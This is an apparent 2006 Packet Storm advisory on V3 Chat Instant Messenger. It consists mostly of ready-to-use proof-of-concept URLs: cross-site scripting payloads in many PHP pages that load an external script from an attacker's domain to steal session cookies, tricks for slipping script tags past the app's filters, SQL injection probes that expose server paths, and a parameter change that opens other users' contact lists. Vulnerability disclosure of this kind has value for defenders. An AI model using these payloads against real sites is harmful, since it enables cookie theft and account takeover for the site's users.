v3chatIM.txt

2006-06-26T00:00:00
ID PACKETSTORM:47681
Type packetstorm
Reporter Luny
Modified 2006-06-26T00:00:00

Description

                                        
                                            `V3 Chat Instant Messenger  
  
http://www.v3chat.com/  
  
Affected files:  
  
/mail/index.php  
/mail/reply.php  
is_online.php  
online.php  
profile.php  
profileview.php  
search.php  
mycontacts.php  
expire.php  
  
* Editing your profile:  
  
- input boxes  
  
------------------------------------------  
  
Mail Vulnerabilities:  
  
Full path disclosure via SQL injection on id when reading mail:  
  
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17  
  
XSS vuln with cookie disclosure:  
  
We can bypass V3chats filters by using malformed img tags around out script tags. PoC:  
  
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
Replying to mail XSS vulns:  
  
http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
---------------------------------------  
  
Members online XSS vulns with cookie disclosure:  
  
http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
  
Same as above, on online.php:  
  
http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></  
  
SCRIPT>">  
  
Adding members via Online.php Mysql error & full path disclosure:  
  
http://www.example.com/messenger/online.php?action=update&membername='  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1  
  
-------------------------------------  
  
Search.php XSS vuln:  
  
http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
  
Adding a member from search.php XSS vuln:  
  
http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2=  
--------------------------------------  
  
Same as above, this time on profile.php:  
  
http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
-----------------------------------  
  
Same as above, on Profileview.php now:  
  
http://www.example.com/messenger/profileview.php?membername=demo<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
----------------------------------  
  
XSS vuln with cookie disclosure when editing profile:  
  
To bypass V3 chats filters we can use this XSS example. Credits to RSnake.Script tags wrapped around a document.write function that writes part of our second   
  
script tag.  
  
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>  
  
-------------------------------  
  
Mycontacts.php XSS vulns with user bypass.  
  
It seems after you log in as a user youre able to put in any username in membername= and it will navigate you to their buddylist. From there you can add,   
  
remove, chat with, etc people on their buddylist. etc.  
  
PoC:  
http://example.com/messenger/mycontacts.php?membername=putausername  
  
-------------------------------  
  
Expire.php XSS vuln:  
  
http://example.com/messenger/expire.php?cust_name=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
-----------------------------  
  
Screenshots:  
http://www.youfucktard.com/xsp/v3chat1.jpg  
http://www.youfucktard.com/xsp/v3chat2.jpg  
http://www.youfucktard.com/xsp/v3chat3.jpg  
http://www.youfucktard.com/xsp/v3chat4.jpg  
http://www.youfucktard.com/xsp/v3chat5.jpg  
http://www.youfucktard.com/xsp/v3chat6.jpg  
http://www.youfucktard.com/xsp/v3chat7.jpg  
http://www.youfucktard.com/xsp/v3chat8.jpg  
http://www.youfucktard.com/xsp/v3chat9.jpg  
http://www.youfucktard.com/xsp/v3chat10.jpg  
`